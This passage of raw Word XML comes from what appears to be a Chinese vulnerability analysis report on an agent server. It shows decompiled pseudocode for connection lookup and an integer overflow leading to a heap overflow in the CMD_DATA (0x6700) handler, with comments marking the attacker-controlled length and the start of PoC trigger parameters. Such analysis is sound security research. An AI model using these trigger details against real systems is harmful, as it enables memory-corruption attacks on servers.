          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> out1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> DWORD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> out2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> DWORD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> out3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>{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// 遍历 list_head+8 的单链表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// 每个节点: offset6=conn_id, offset7=agent_id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for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">node </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> list_head</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="54"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>];</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> node</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> node </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> node</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="54"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>])</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>{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if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>node</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="54"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>==</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> conn_id </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>&amp;&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> node</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="54"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>==</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> agent_id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>{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72"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">out1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> node</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="54"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>];</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">out2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> node</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="54"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>];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71"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>out3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">out3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> node</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="54"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>];</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">            remove_from_list</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>list_head</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> node</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>);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71"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> TRUE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      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>}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return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> FALSE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="64"/>
        </w:rPr>
        <w:t>// ← 新鲜连接总是返回 FALSE</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4924313F">
      <w:pPr>
        <w:pStyle w:val="23"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此函数仅在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>n4=4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>路径（重传重连场景）中被调用。对新鲜代理连接，该函数返回</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>FALSE，n4=4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>路径静默返回，不会触发关闭。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A2601C">
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i105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8"/>
    <w:p w14:paraId="7D886F9E">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="仿宋"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>二、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>分析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F030DD3">
      <w:pPr>
        <w:pStyle w:val="5"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="X2ab6e2a3e275adfcf36b8940c73b465d929da6a"/>
      <w:bookmarkStart w:id="21" w:name="X01333b10ff027cb1774a79b462bae4aac6645f4"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>VULN-0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：CMD_DATA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (0x6700) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>整数溢出</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>堆溢出</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A8A8F8">
      <w:pPr>
        <w:pStyle w:val="23"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>处理函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="48"/>
        </w:rPr>
        <w:t>sub_1400A0EE0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（AgentDisposal.cpp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>~L16091）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B30C4F2">
      <w:pPr>
        <w:pStyle w:val="49"/>
        <w:rPr>
          <w:rStyle w:val="64"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="64"/>
        </w:rPr>
        <w:t>// sub_1400A0EE0(conn, header*, payload*)</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">v116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72"/>
        </w:rPr>
        <w:t>*(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>DWORD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>*)(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="54"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">              </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="64"/>
        </w:rPr>
        <w:t>// 攻击者控制 ← 关键</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">v117 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> context_string1_len</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="64"/>
        </w:rPr>
        <w:t>// 服务端内部（= 0）</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">v118 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> context_string2_len</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="64"/>
        </w:rPr>
        <w:t>// 服务端内部（= 0）</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="64"/>
        </w:rPr>
        <w:t>// 整数溢出</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">alloc_size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72"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>uint32</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>)(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="54"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">v116 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> v117 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> v118</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="54"/>
        </w:rPr>
        <w:t>30</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">buf </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> HeapAlloc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>alloc_size</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="64"/>
        </w:rPr>
        <w:t>// 分配可能非常小</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48165562">
      <w:pPr>
        <w:pStyle w:val="49"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3416935" cy="2179320"/>
            <wp:effectExtent l="0" t="0" r="12065" b="5080"/>
            <wp:docPr id="11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3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16935" cy="217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57A150">
      <w:pPr>
        <w:pStyle w:val="49"/>
        <w:rPr>
          <w:rStyle w:val="64"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>*(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>DWORD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>*)(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">buf </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="54"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> v116</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="64"/>
        </w:rPr>
        <w:t>// WCHAR 拷贝循环（拷贝直到 null WCHAR）</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">wchar_src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72"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>WCHAR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>*)(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="54"/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="64"/>
        </w:rPr>
        <w:t>// 攻击者控制的宽字符串</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28686888">
      <w:pPr>
        <w:pStyle w:val="49"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4997450" cy="5118100"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="12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3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97450" cy="511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3B8AD9">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">PoC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>参数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（v116=1）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D82AC60">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="48"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>alloc_size = 32</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
